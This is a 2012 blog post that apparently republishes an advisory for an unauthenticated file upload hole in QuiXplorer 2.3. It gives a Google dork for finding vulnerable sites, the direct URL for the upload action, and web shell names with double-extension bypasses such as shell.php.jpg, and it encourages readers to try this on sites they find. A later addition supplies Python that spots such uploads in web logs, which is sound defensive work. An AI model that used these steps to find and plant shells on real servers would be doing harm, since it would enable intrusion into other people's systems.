Indonesian Blogger


Monday, 06 February 2012

QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability

# Exploit Title: QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability
# Google Dork: "QuiXplorer 2.3 - the QuiX project"
# Date: 13/11/2011
# Author: PCA & krhr_krhr and
# Software Link: http://quixplorer.sourceforge.net/
# Version: QuiXplorer 2.3
# Tested on: Linux, Windows
# CVE :
---------------------------------------------------------------------------------------------------------- Paste into Google
Google Dork: "QuiXplorer 2.3 - the QuiX project" <== remove the quotation marks

Vulnerability
You will then find examples like the ones below:
Exploit:
http://[localhost]/[path]/index.php?action=list&order=name&srt=yes
http://site.com/[xyz]/index.php?action=list&order=name&srt=yes
-----------------------------------------------------------------------------------------------------------
After you go to the site you searched for, you will see the file manager.
You can upload your files there:
find the icon on the page and finally click the upload option.

You can also upload directly by changing the URL; just place >> action=upload&order=name&srt=yes
after index.php? <==

Example: http://site.com/[xyz]/index.php?action=upload&order=name&srt=yes

Supported shell examples: shell.php, shell.asp, shell.html, shell.php.jpg, shell.asp.jpg, or any other supported file.
Click on your file to view it.

Confused?
Just try it out first... over time you will understand it on your own.
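The request pattern described above, seen from the defender's side, as an added example that is not part of the original post: a Python check over web access logs that flags a POST to `index.php?action=upload` and any later request by the same client for a file with an active extension in any position (so `.php.jpg` is caught too). The sample log lines, the `/fm/files/` path, the extension list and the assumption that uploads arrive as POST requests are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Extensions a web server may execute or render as active content (assumed list).
ACTIVE_EXT = {"php", "php3", "php5", "phtml", "asp", "aspx", "jsp", "html", "htm"}
# Minimal matcher for Apache/nginx combined-format log lines.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3}')

def has_active_extension(name):
    """True if ANY dot-separated segment after the base name is active."""
    return any(part in ACTIVE_EXT for part in name.lower().split(".")[1:])

def scan(lines):
    """Return (ip, reason, target) findings for upload-then-fetch activity."""
    uploaders, findings = set(), []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, target = m["ip"], m["method"], m["target"]
        url = urlsplit(target)
        filename = url.path.rsplit("/", 1)[-1]
        if filename == "index.php":
            # The file manager itself: only a POST with action=upload is of interest.
            if method == "POST" and parse_qs(url.query).get("action") == ["upload"]:
                uploaders.add(ip)
                findings.append((ip, "upload-post", target))
            continue
        if ip in uploaders and has_active_extension(filename):
            findings.append((ip, "active-file-after-upload", target))
    return findings

# Constructed sample log lines (not taken from a real server).
SAMPLE = [
    '198.51.100.7 - - [06/Feb/2012:10:00:01 +0000] "GET /fm/index.php?action=list&order=name&srt=yes HTTP/1.1" 200 5120',
    '198.51.100.7 - - [06/Feb/2012:10:00:09 +0000] "POST /fm/index.php?action=upload&order=name&srt=yes HTTP/1.1" 200 812',
    '198.51.100.7 - - [06/Feb/2012:10:00:15 +0000] "GET /fm/files/notes.php.jpg HTTP/1.1" 200 64',
    '203.0.113.9 - - [06/Feb/2012:10:01:00 +0000] "GET /fm/files/photo.jpg HTTP/1.1" 200 20480',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

The same `has_active_extension` test can be applied to file names at upload time to reject them before they are stored.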
